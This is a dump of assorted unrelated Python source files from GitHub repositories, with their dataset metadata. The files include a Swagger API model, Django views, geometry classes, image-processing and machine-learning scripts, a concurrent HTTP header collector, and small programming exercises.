font=font, fill=(0, 0, 0))\n\n # save the image\n image.save('card.png')\n\n\ndef create_card(title, definition, point_value, card_width, card_height):\n # code to create the card\n # wrap the title text\n wrapped_title = textwrap.wrap(title, width=card_width)\n # wrap the definition text\n wrapped_definition = textwrap.wrap(definition, width=card_width)\n\n\ndef create_card(title, definition, point_value, card_width, card_height):\n # code to create the card\n # add some padding to the card\n padding = 10\n # draw a rectangle around the title\n draw.rectangle([(padding, padding), (card_width-padding, padding+font_size)], fill=(255, 255, 255))\n # draw a rectangle around the definition\n draw.rectangle([(padding, padding+font_size), (card_width-padding, card_height-padding)], fill=(255, 255, 255))\n # draw a circle around the point value\n draw.ellipse([(card_width-padding-font_size, card_height-padding-font_size), (card_width-padding, card_height-padding)], fill=(255, 255, 255))\n","repo_name":"grahamwaters/Mimikers","sub_path":"storage_bin/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9975195785","text":"# coding: utf-8\n\n\"\"\"\n metal-api\n\n API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501\n\n OpenAPI spec version: v0.25.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass HttperrorsHTTPErrorResponse(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'message': 'str',\n 'statuscode': 'int'\n }\n\n attribute_map = {\n 'message': 'message',\n 'statuscode': 'statuscode'\n }\n\n def __init__(self, message=None, statuscode=None): # noqa: E501\n \"\"\"HttperrorsHTTPErrorResponse - a model defined in Swagger\"\"\" # noqa: E501\n\n self._message = None\n self._statuscode = None\n self.discriminator = None\n\n self.message = message\n self.statuscode = statuscode\n\n @property\n def message(self):\n \"\"\"Gets the message of this HttperrorsHTTPErrorResponse. # noqa: E501\n\n error message # noqa: E501\n\n :return: The message of this HttperrorsHTTPErrorResponse. # noqa: E501\n :rtype: str\n \"\"\"\n return self._message\n\n @message.setter\n def message(self, message):\n \"\"\"Sets the message of this HttperrorsHTTPErrorResponse.\n\n error message # noqa: E501\n\n :param message: The message of this HttperrorsHTTPErrorResponse. # noqa: E501\n :type: str\n \"\"\"\n if message is None:\n raise ValueError(\"Invalid value for `message`, must not be `None`\") # noqa: E501\n\n self._message = message\n\n @property\n def statuscode(self):\n \"\"\"Gets the statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n\n http status code # noqa: E501\n\n :return: The statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n :rtype: int\n \"\"\"\n return self._statuscode\n\n @statuscode.setter\n def statuscode(self, statuscode):\n \"\"\"Sets the statuscode of this HttperrorsHTTPErrorResponse.\n\n http status code # noqa: E501\n\n :param statuscode: The statuscode of this HttperrorsHTTPErrorResponse. # noqa: E501\n :type: int\n \"\"\"\n if statuscode is None:\n raise ValueError(\"Invalid value for `statuscode`, must not be `None`\") # noqa: E501\n\n self._statuscode = statuscode\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(HttperrorsHTTPErrorResponse, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, HttperrorsHTTPErrorResponse):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"metal-stack/metal-python","sub_path":"metal_python/models/httperrors_http_error_response.py","file_name":"httperrors_http_error_response.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"8690424977","text":"s1= ['Ahmad', 18, 17, 19.5, 8, 25]\ns2= ['Sami', 20, 20, 19, 9, 28]\ns3= ['Faris', 14.5, 16, 13, 7, 23]\nlist1=[s1[0],s2[0],s3[0]]\nsum=0\nstudentName=str(input(\"Enter student's name\"))\nif (studentName in list1):\n if (studentName in s1):\n for i in range(1,len(s1)):\n sum=sum+s1[i]\n print(sum)\n elif studentName in s2:\n for i in range(1,len(s2)):\n sum=sum+s2[i]\n print(sum)\n elif studentName in s3:\n for i in range(1,len(s3)):\n sum=sum+s3[i]\n print(sum)\nelse:\n print(\"Student is not recorded 0 \")\n","repo_name":"AhlamIzzeldeen/Facoders","sub_path":"Week4-2.py","file_name":"Week4-2.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37654155408","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom .forms import ContactForm\nfrom django.urls import reverse_lazy\nimport time\nfrom blog.models import Category\n\ndef contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n name = form.cleaned_data.get('name')\n email = form.cleaned_data['email']\n content = form.cleaned_data['content']\n \n pos_arroba = email.find('@')\n dominio = email[pos_arroba+1:]\n \n if dominio != \"gmail.com\":\n form.add_error('email','dominio invalido')\n return render(request,'contact/contact.html',{'form':form})\n #print(form.cleaned_data.get('name'))\n #print(form.cleaned_data['email'])\n #return HttpResponseRedirect('/contact/thanks/')\n \n return HttpResponseRedirect(reverse_lazy('contact:thanks'))\n else: \n form = ContactForm()\n return render(request, 'contact/contact.html',{'form':form})\n \ndef thanks(request):\n return render(request, 'contact/thanks.html')\n\n#Practica AJAX\ndef ejecutaAJAX(request):\n if request.method == 'POST':\n #Validacion de campos\n categorias = Category.objects.all()\n opcion = request.POST.get('valor','')\n respuesta = {}\n opciones = {}\n if opcion == '1':\n respuesta['estado'] = 'correcto'\n for categoria in categorias:\n opciones[categoria.id] = categoria.name\n #opciones['1'] = 'Opcion1'\n #opciones['2'] = 'Opcion2'\n #opciones['3'] = 'Opcion3'\n #opciones['4'] = 'Opcion4'\n #opciones['5'] = 'Opcion5'\n elif opcion == '2':\n respuesta['estado'] = 'correcto'\n opciones['1'] = '2 - Opcion1'\n opciones['2'] = '2 - Opcion2'\n opciones['3'] = '2 - Opcion3'\n else:\n respuesta['estado'] = 'No valido'\n \n respuesta['opciones'] = opciones\n time.sleep(5)\n return JsonResponse(respuesta)\n \n\n# Create your views here.\n","repo_name":"wariormex/DjangoRestaurante","sub_path":"Proyecto/webRestaurante/contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20274969067","text":"#!/usr/bin/python3\n\"\"\"Defines 'Square' subclass.\"\"\"\nfrom models import rectangle\n\n\nclass Square(rectangle.Rectangle):\n \"\"\"Initializes Square objects with attributes.\n\n It defnies mandatory @size and optional @x & @y coordinates upon object\n instantiation and defines instance methods to get and set them\n \"\"\"\n\n def __init__(self, size, x=0, y=0, id=None):\n \"\"\"Define attributes for square object.\n\n Args:\n self (object): Refers to object instantiated\n size (int): Size of Square\n x (int, optional): Horizontal measurement\n y (int, optional): Vertical measurement\n\n Returns:\n None\n \"\"\"\n super().__init__(size, size, x, y, id)\n return None\n\n @property\n def size(self):\n \"\"\"Return size of square.\n\n Args:\n self (object): Refers to object instantiated\n\n Returns:\n The private attribute 'size'\n \"\"\"\n return super().width\n\n @size.setter\n def size(self, value):\n \"\"\"Sets the @width and @height attribs to @value\n\n Args:\n self (object): Refers to object instantiated\n value (int): value to set @width & @height\n\n Returns:\n None\n \"\"\"\n self.width = value\n self.height = value\n return None\n\n def __str__(self):\n \"\"\"Display object representing string.\n\n Args:\n self (object): Refers to object instantiated\n\n Returns:\n String representation of square object\n \"\"\"\n string = \"[Square] ({}) {}/{}\".format(self.id, self.x, self.y)\n string += \" - {}\".format(self.size)\n return string\n\n def update(self, *args, **kwargs):\n \"\"\"Update attributes of Square object.\n\n Args:\n First element of @args is 'id'\n Second element of @args is 'width'\n Third element of @args is 'height'\n Fourth element of @args is 'x'\n Fifth element of @args is 'y'\n\n Returns:\n None\n \"\"\"\n arg_position = 0\n if len(args) != 0:\n for elem in args:\n if arg_position == 0:\n self.id = elem\n elif arg_position == 1:\n self.size = elem\n elif arg_position == 2:\n self.x = elem\n elif arg_position == 3:\n self.y = elem\n arg_position = arg_position + 1\n else:\n for k, v in kwargs.items():\n if k == \"id\":\n self.id = v\n elif k == \"size\":\n self.size = v\n elif k == \"x\":\n self.x = v\n elif k == \"y\":\n self.y = v\n return None\n\n def to_dictionary(self):\n \"\"\"Converts object to dictionary object.\n\n Args:\n self (object): Refers to object instantiated\n\n Returns:\n Dictionary representation of 'Square' object.\n \"\"\"\n return {\n \"id\": self.id,\n \"size\": self.size,\n \"x\": self.x,\n \"y\": self.y\n }\n\n pass\n","repo_name":"leykun-gizaw/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14609164820","text":"#!/bin/python3\n#Author: avacadoPWN (Kovan MohammedAmeen)\n#License: MIT\n\nfrom time import sleep, time\nimport json\nimport queue\nimport ssl\nimport threading\nimport requests\nimport sys\nimport datetime\nimport os\nfrom urllib3 import poolmanager\nfrom concurrent.futures import ThreadPoolExecutor\nfrom rich import print\nt = datetime.datetime\n\n\nif len(sys.argv) >= 2 and len(sys.argv) < 4:\n if len(sys.argv) == 2:\n args = {\n 'urls_list': sys.argv[1],\n 'json_export': None}\n else:\n args = {\n 'urls_list': sys.argv[1],\n 'json_export': sys.argv[2]}\nelse:\n print(\"Usage:\\n\\n\" +\n \"./headerz.py url_list stats_file(ndjson)\\n\")\n exit(-1)\n\nprint(\"\\nNumber of Threads (default 65): \", end='')\nnum_of_threads = input()\nif num_of_threads == '':\n num_of_threads = 65\nelif not num_of_threads.isnumeric():\n print(\"[red]Error[/red], Thread amount must be in numeric value (0-250)\\nTry again.\")\n exit(-1)\nelse:\n num_of_threads = int(num_of_threads)\n\n\nif args['json_export']:\n stats_file = args['json_export']\nelse:\n stats_file = args['urls_list'] + \" - \" + \\\n t.now().strftime(\"%Y-%m-%d_%H-%M-%S\") + \".ndjson\"\n\nresults_directory = os.getcwd()\n\nexport_file = open(results_directory+stats_file, \"a+\")\n\n\ntry:\n urls = open(args['urls_list'], \"r\").read().splitlines()\n\nexcept FileNotFoundError:\n print(\"\\nError, URL list:\", \"'\"+args['urls_list']+\"'\", \"not found!\")\n exit(-1)\n\n\nq = queue.Queue()\nfor url in urls:\n q.put(url)\n\n\nclass EmptyURL(Exception):\n pass\n\n\nclass TLSAdapter(requests.adapters.HTTPAdapter):\n\n def init_poolmanager(self, connections, maxsize, block=False):\n ctx = ssl.create_default_context()\n ctx.set_ciphers('DEFAULT@SECLEVEL=1')\n self.poolmanager = poolmanager.PoolManager(\n num_pools=connections,\n maxsize=maxsize,\n block=block,\n ssl_version=ssl.PROTOCOL_TLS,\n ssl_context=ctx)\n\n\nthread_local = threading.local()\n\n\ndef get_session():\n if not hasattr(thread_local, \"session\"):\n thread_local.session = requests.Session()\n thread_local.session.mount('https://', TLSAdapter())\n return thread_local.session\n\n\nheader = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'}\n\n\ndef check(url):\n if url == '':\n print('empty url')\n raise EmptyURL\n session = get_session()\n\n try:\n if 'http' not in url:\n url = \"https://\"+url+\"/\"\n\n response = session.head(url, headers=header, timeout=10)\n add_to_dict(response.headers, url, response.url)\n stats['passed'] += 1\n except requests.exceptions.SSLError:\n stats['ssl_error'] += 1\n\n except EmptyURL:\n stats['num_of_requests'] += -1\n pass\n except Exception:\n stats['error'] += 1\n\n finally:\n stats['num_of_requests'] += 1\n print(stats['num_of_requests'], '/', stats['num_of_urls'], end='\\r')\n\n\nstats = {\n 'num_of_requests': 0,\n 'passed': 0,\n 'ssl_error': 0,\n 'error': 0,\n 'num_of_urls': len(urls)\n}\n\n\ncollected_data = {}\n\n\ndef add_to_dict(header, url, dest_url):\n collected_data[url] = {'url': dest_url, \"headers\": dict(header)}\n\n\ncounter = 0\n\n\ndef export_ndjson(data):\n global counter\n print('\\nexporting the collected headers to NDJSON')\n for item in data:\n new_item = {}\n new_item['domain'] = item\n new_item['url'] = data[item]['url']\n new_item['headers'] = data[item]['headers']\n export_file.write(json.dumps(new_item))\n export_file.write('\\n')\n counter += 1\n print(\"progress: {:d} /{:d}\".format(counter, size), end='\\r')\n\n\ndef main():\n with ThreadPoolExecutor(max_workers=num_of_threads) as executor:\n try:\n executor.map(check, [q.get() for x in range(q.qsize())])\n finally:\n executor.shutdown(wait=True)\n\n\nt1 = time()\nprint('Fetching {} URLs...'.format(len(urls)))\nmain()\nprint()\nprint(stats)\nsize = len(collected_data)\nexport_ndjson(collected_data)\nprint(\"\\n[green]All done.[/green]\")\nprint(\"Time Elapsed: {:.2f} S\\n\".format(time()-t1))\n","repo_name":"avacadoPWN/headerz","sub_path":"headerz.py","file_name":"headerz.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37836677108","text":"# -*- coding: utf-8 -*-\n\"\"\"\nKent-CAS: Camera Acquisition System\n\nThreading class for image processing of fibre bundle inline holography images. This\ninherits from ImageProcessorThread which contains core functionality. \n\n@author: Mike Hughes\nApplied Optics Group\nUniversity of Kent\n\n\"\"\"\n\nimport sys\nimport logging\n\nimport numpy as np\nimport time\n\nfrom ImageProcessorThread import ImageProcessorThread\nimport pybundle\nfrom pybundle import PyBundle\nimport pyholoscope\n\n\nimport matplotlib.pyplot as plt\n\nclass InlineBundleProcessor(ImageProcessorThread):\n \n method = None\n mask = None\n crop = None\n filterSize = None\n calibration = None\n refocus = False\n pyb = None\n preProcessFrame = None\n autoFocusFlag = False\n srCalibrateFlag = False\n invert = False\n showPhase = False\n sr = False\n batchProcessNum = 1\n \n def __init__(self, inBufferSize, outBufferSize, **kwargs):\n \n super().__init__(inBufferSize, outBufferSize, **kwargs)\n self.pyb = PyBundle()\n self.holo = pyholoscope.Holo(pyholoscope.INLINE_MODE, 1, 1)\n \n \n def process_frame(self, inputFrame):\n \"\"\" This is called by the thread whenever a frame needs to be processed\"\"\"\n \n if self.sr == True:\n # Check we have a list of images, otherwise return None\n\n if not inputFrame.ndim > 2:\n print(\"SR but no list of images\")\n return None\n \n \n \n # fig, axs = plt.subplots(2, 4, dpi=150)\n # fig.suptitle('Raw', fontsize=16)\n # axs[0,0].imshow(inputFrame[:,:,0])\n # axs[0,1].imshow(inputFrame[:,:,1])\n # axs[0,2].imshow(inputFrame[:,:,2])\n # axs[0,3].imshow(inputFrame[:,:,3])\n # axs[1,0].imshow(inputFrame[:,:,4])\n # axs[1,1].imshow(inputFrame[:,:,5])\n # axs[1,2].imshow(inputFrame[:,:,6])\n # axs[1,3].imshow(inputFrame[:,:,7])\n\n\n imgs = pybundle.SuperRes.sort_sr_stack(inputFrame, self.batchProcessNum - 1) \n \n # fig, axs = plt.subplots(2, 4, dpi=150)\n # fig.suptitle('Sorted', fontsize=16)\n # axs[0,0].imshow(imgs[:,:,0])\n # axs[0,1].imshow(imgs[:,:,1])\n # axs[0,2].imshow(imgs[:,:,2])\n # axs[0,3].imshow(imgs[:,:,3])\n # axs[1,0].imshow(imgs[:,:,4])\n # axs[1,1].imshow(imgs[:,:,5])\n # axs[1,2].imshow(imgs[:,:,6])\n\n\n \n if False:\n fig, axs = plt.subplots(2, 2)\n plt.title(\"After Sort\")\n axs[0,0].imshow(imgs[:,:,0])\n axs[0,1].imshow(imgs[:,:,1])\n axs[1,0].imshow(imgs[:,:,2])\n axs[1,1].imshow(imgs[:,:,3])\n \n #print(\"num images reconing with \", np.shape(imgs) )\n \n if imgs is not None:\n outputFrame = self.pyb.process(imgs) \n self.preProcessFrame = outputFrame\n \n \n else: # Not Superresolution\n \n # In case we have a list of images instead of an image \n #if inputFrame.__class__ == list:\n # inputFrame = inputFrame[0]\n if inputFrame.ndim == 3:\n inputFrame = inputFrame[:,:,0]\n outputFrame = self.pyb.process(inputFrame)\n \n self.preProcessFrame = outputFrame\n \n if self.refocus == True and outputFrame is not None:\n outputFrame = self.holo.process(outputFrame)\n if self.showPhase is False:\n outputFrame = np.abs(outputFrame)\n if self.invert is True:\n outputFrame = np.max(outputFrame) - outputFrame\n else:\n outputFrame = np.angle(outputFrame) \n if outputFrame is not None:\n outputFrame = np.abs(outputFrame) # Take intensity from complex image\n \n \n return outputFrame\n\n\n\n def handle_flags(self):\n \"\"\" Flags can be set externally for actions which cannot be performed\n until one or more images are available. Flags are checked every time we process a new image \n \"\"\"\n \n # AUTOFOCUS\n if self.autoFocusFlag:\n self.autoFocusFlag = False\n t1 = time.perf_counter()\n \n \n # SUPER RESOLUTION CALIBRATION \n if self.srCalibrateFlag:\n if self.get_num_images_in_input_queue() >= self.batchProcessNum:\n self.calibrate_sr()\n # Remove flag\n self.srCalibrateFlag = False\n \n def calibrate_sr(self):\n \n #if len(self.currentInputImage) >= self.batchProcessNum:\n \n # Convert list of images to 3D numpy array\n #img = self.currentInputImage[0]\n #imgs = np.zeros((np.shape(img)[0], np.shape(img)[1], self.batchProcessNum))\n #imgs[:,:,0] = img\n \n #for idx, img in enumerate(self.currentInputImage):\n # imgs[:,:,idx] = self.currentInputImage[idx]\n \n # Extract a sequence of frames in correct order following blank reference frame\n calibImgs = pybundle.SuperRes.sort_sr_stack(self.currentInputImage, self.batchProcessNum - 1) \n \n # SR Calibration\n self.pyb.set_sr_calib_images(calibImgs)\n self.pyb.calibrate_sr()\n \n #def acquire_sr_backgrounds(self):\n # backImgs = pybundle.SuperRes.sort_sr_stack(self.currentInputImage, self.batchProcessNum - 1) \n \n # self.pyb.set_sr_backgrounds(backImgs)\n \n \n def auto_focus(self, **kwargs):\n \n if self.preProcessFrame is not None:\n return self.holo.auto_focus(self.preProcessFrame.astype('float32'), **kwargs)\n \n \n def update_settings(self):\n \"\"\" For compatibility with multi-processor version\"\"\"\n pass","repo_name":"MikeHughesKent/holobundle","sub_path":"src/processors/InlineBundleProcessor.py","file_name":"InlineBundleProcessor.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40642115865","text":"#!/usr/bin/env python\n# coding:utf-8\n'''''\nCreated on 2014年11月24日\n@author: zhaohf\n'''\nfrom sklearn import svm\nfrom numpy import genfromtxt, savetxt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\ndef main():\n dataset = pd.read_csv(\"train.csv\").values[1:]\n test = pd.read_csv(\"test.csv\").values[1:]\n scaler = StandardScaler().fit(test)\n test = scaler.transform(test)\n target = [x[0] for x in dataset]\n train = [x[1:] for x in dataset]\n scaler = StandardScaler().fit(train)\n train = scaler.transform(train)\n svc = svm.SVC(probability=True)\n svc.fit(train, target)\n predicted_probs = [[index+1,x[1]] for index,x in enumerate(svc.predict_proba(test))]\n savetxt('svm_benchmark.csv',predicted_probs,delimiter=',',fmt='%d,%f',header='MoleculeId,PredictedProbability',comments='')\n\nif __name__ == '__main__':\n main()","repo_name":"dugzzuli/kaggleDemo","sub_path":"分子反映分类/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40632956319","text":"# Crie um programa onde o usuário digite uma expressão qualquer que use\r\n# parênteses. Seu aplicativo deverá analisar se a expressão passada está com\r\n# os parênteses abertos e fechados na ordem correta.\r\n#\r\n# RESOLUÇÃO GUANABARA #\r\n\r\n# n = input('Digite uma expressão: ')\r\n# contador1 = n.count('(')\r\n# contador2 = n.count(')')\r\n# if contador1 != contador2:\r\n# print('Erro na expressão.')\r\n# else:\r\n# print('Expressão válida.')\r\n\r\nexpr = str(input('Digite a expressão: '))\r\npilha = []\r\nfor simb in expr:\r\n if simb == '(':\r\n pilha.append('(')\r\n elif simb == ')':\r\n if len(pilha) > 0:\r\n pilha.pop()\r\n else:\r\n pilha.append(')')\r\n break\r\nif pilha == 0:\r\n print('Solução válida.')\r\nelse:\r\n print('Solução inválida.')","repo_name":"luan661/Cursoemvideo-exercicios","sub_path":"ex083.py","file_name":"ex083.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29609400882","text":"import os\nimport random\nimport shutil\n\n\ndata_folder = \"./data/cropped\"\ntrain_out_folder = \"./data/train\"\ntest_out_folder = \"./data/test\"\neval_folder = \"./data/eval\"\n\ndef sufficient_images(individual_name, amount):\n # check if at least amount images are available for the individual\n folder_path = os.path.join(data_folder, individual_name)\n return len(os.listdir(folder_path)) >= amount\n\ndef copy_to(individuals, dest_folder):\n # copies all these individuals to the train folder\n for individual in individuals:\n shutil.copytree(os.path.join(data_folder,individual), os.path.join(dest_folder,individual))\n\nindividuals = [name for name in os.listdir(data_folder) if os.path.isdir(os.path.join(data_folder,name)) and sufficient_images(name, 3)]\nimage_count = sum([1 for individual in individuals for s in os.listdir(os.path.join(data_folder, individual))])\nprint(\"Total images after removing individuals with to little samples: \", image_count)\namount_test = round(0.1 * len(individuals))\nrandom.shuffle(individuals)\ncopy_to(individuals[:amount_test], test_out_folder)\ncopy_to(individuals[amount_test:], train_out_folder)\namount_eval = round(0.05 * sum([1 for individual in os.listdir(test_out_folder) for s in os.path.join(test_out_folder, individual)]))\nprint(\"Eval:\", amount_eval)\n\nindividuals_test = individuals[:amount_test]\nif not os.path.exists(eval_folder):\n os.mkdir(eval_folder)\nfor i in range(0, amount_eval):\n while True:\n individual = random.sample(individuals_test, 1)[0]\n individual_path = os.path.join(test_out_folder, individual)\n # only pick sample if afterwards more than 3 images still left for the individual\n if len(os.listdir(individual_path)) < 4:\n continue\n individual_samples = [name for name in os.listdir(individual_path) if os.path.splitext(name)[1] in [\".jpg\", \".jpeg\", \".png\"]]\n sample = random.sample(individual_samples, 1)[0]\n if not os.path.exists(os.path.join(eval_folder, individual)):\n os.mkdir(os.path.join(eval_folder, individual))\n shutil.move(os.path.join(individual_path, sample), os.path.join(eval_folder, individual, sample))\n break\n","repo_name":"Lasklu/gorillavision","sub_path":"scripts/split_train_test_eval.py","file_name":"split_train_test_eval.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"9273681451","text":"# LeetCode 19\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\n# Time Complexity : O(n)\n# Space COmplexity : O(1)\nclass Solution:\n def removeNthFromEnd(self, head, n: int):\n\n # if there is one element, return None\n if not head.next:\n return None\n \n # start both pointers at head\n p1 = head\n p2 = head\n \n # increment fast pointer by n\n for i in range(n):\n p2 = p2.next\n \n # traverse to the end of the linked list\n while p2 and p2.next:\n p1 = p1.next\n p2 = p2.next\n \n # if p2 is None, return p1.next\n if not p2:\n return p1.next\n \n # get the next value\n skip = p1.next.next\n # apply the skip\n p1.next = skip\n \n # return the head\n return head","repo_name":"gelbling/LeetCode-Solutions","sub_path":"remove_nth_node_from_end_of_list.py","file_name":"remove_nth_node_from_end_of_list.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"15425687328","text":"import random\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef color_space_error(img, num_precent = 0.6):\r\n # B, G, R = cv2.split(img)\r\n y_cb_img = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)#cv2.merge([Y, Cr, Cb])\r\n Y, Cr, Cb = cv2.split(y_cb_img)\r\n height, width, _ = img.shape\r\n num = int(height * width * num_precent)\r\n pixel_position = random.sample(range(0, height * width), num)\r\n for pos in pixel_position:\r\n Y[(pos // width) - 1, pos % width] -= 16 \r\n Cr[(pos // width) - 1, pos % width] -= 128\r\n Cb[(pos // width) - 1, pos % width] -= 128 \r\n dst = cv2.merge([Y, Cr, Cb])\r\n output_img = cv2.cvtColor(dst, cv2.COLOR_YCrCb2BGR)\r\n return output_img\r\n\r\n# '''\r\n#test\r\nsrc = cv2.imread(\"../VOCdevkit/VOC2007/JPEGImages/000000.jpg\")\r\ncv2.imshow('original img', src)\r\nblack_src = color_space_error(src, 0.8)\r\ncv2.imshow('color img1', black_src)\r\nblack_src = color_space_error(src, 1)\r\ncv2.imshow('color img2', black_src)\r\ncv2.waitKey(0)\r\n# '''\r\n","repo_name":"realcorruption/image-noise-pattern","sub_path":"CSC-D.py","file_name":"CSC-D.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72352984410","text":"import numpy as np\nimport dgl\nimport torch\nimport os\nimport json\n\ndef mark_rel_importance(g,entype = 'vul'):\n for srctype, etype, dsttype in g.canonical_etypes:\n g.edges[etype].data['rd'] = 0\n\n\ndef attribute_degree(g,kg, entype,path ):\n path = path + 'attr_degree.json'\n if os.path.exists(path):\n print(\"Load Node Degree from: \", path)\n with open(path) as f:\n df = json.load(f)\n for ntype in g.ntypes:\n if ntype != entype:\n g.nodes[ntype].data['d1'] = torch.FloatTensor(df[ntype]['d1']).reshape(len(df[ntype]['d1']),1)\n g.nodes[ntype].data['d2'] = torch.FloatTensor(df[ntype]['d2']).reshape(len(df[ntype]['d2']),1)\n g.nodes[ntype].data['d'] = torch.FloatTensor(df[ntype]['d']).reshape(len(df[ntype]['d']),1)\n # print( g.nodes[ntype].data['d1'] )\n print(\"Success: load node degree\")\n else:\n df = {}\n for srctype, etype, dsttype in g.canonical_etypes:\n if 'of' in etype:\n df[srctype] = {'d1':[],'d2':[],'d':[]}\n # attributes in a type\n g.nodes[srctype].data['d1'] = torch.zeros((g.number_of_nodes(srctype),1))\n g.nodes[srctype].data['d2'] = torch.zeros((g.number_of_nodes(srctype), 1))\n g.nodes[srctype].data['d'] = torch.zeros((g.number_of_nodes(srctype), 1))\n for i in range(g.number_of_nodes(srctype)):\n succ = g.successors(i, etype)\n # print(\"Etype:{}, Src Type:{}, Successors:{}\".format(etype, srctype, succ))\n g.nodes[srctype].data['d1'][i] = len([x for x in succ if x < kg.splitvulid])\n g.nodes[srctype].data['d2'][i] = len([x for x in succ if x >= kg.splitvulid])\n g.nodes[srctype].data['d'][i] = g.nodes[srctype].data['d1'][i] + g.nodes[srctype].data['d2'][i]\n # print(\">>\", type(g.nodes[srctype].data['d1'][0]), type(g.nodes[srctype].data['d1']))\n for k in df[srctype].keys():\n df[srctype][k] = [int(x) for x in g.nodes[srctype].data[k]]\n # print(g.nodes[srctype].data['d1'])\n\n with open(path, 'w') as f:\n json.dump(df, f, indent=4)\n print('Save node dgree at:',path)\n\ndef get_candidates(g,kg,entype, path):\n import pickle\n path = path + 'candidates.pkl'\n if os.path.exists(path):\n with open(path,'rb') as f:\n g_candidates = pickle.load(f)\n print(\"Success: load candidates\")\n else:\n print('Generate candidates...')\n g_candidates = []\n num_en = g.number_of_nodes(entype)\n for i in range(num_en):\n if i%100 ==0: print(i, i/num_en*100,'%')\n candidates = []\n maxcount = 0\n for srctype, etype, dsttype in g.canonical_etypes:\n if srctype == entype and ('product' in etype or 'vendor' in etype): #etype.replace('has_','') in kg.critical_etypes :\n neighbors = g.successors(i, etype)\n reverse_etype = etype.replace('has_','') + ('_of')\n for n in neighbors:\n can = g.successors(n,reverse_etype)\n for c in can:\n if c not in candidates:\n candidates.append(c)\n # if candidates.count(c)>maxcount:maxcount =candidates.count(c)\n\n # candidates = [x for x in candidates if candidates.count(x)==maxcount]\n if i= kg.splitvulid]\n else:candidates = [x for x in candidates if x!= i and x < kg.splitvulid]\n candidates = list(candidates)\n g_candidates.append(candidates)\n\n with open(path, 'wb') as f:\n # json.dump(df, f, indent=4)\n pickle.dump(g_candidates,f)\n\n return g_candidates\n\ndef get_graph_id(kg, data):\n id_a, id_b = data[:, 0], data[:, 1]\n #print(kg.id2idg['a'].keys())\n\n idg_a = np.array([kg.id2idg['a'][x] for x in id_a])\n idg_b = np.array([kg.id2idg['b'][x] for x in id_b])\n\n return idg_a, idg_b\n\n\ndef get_neighborhood(g, dst):\n frontier = dgl.in_subgraph(g, [dst])\n return np.array(frontier.edges()[0])\n\ndef get_edge_mirror(g,kg):\n # print('Get mirrow dst for each edge...')\n neighbor = [get_neighborhood(g, i) for i in range(g.num_nodes())]\n # 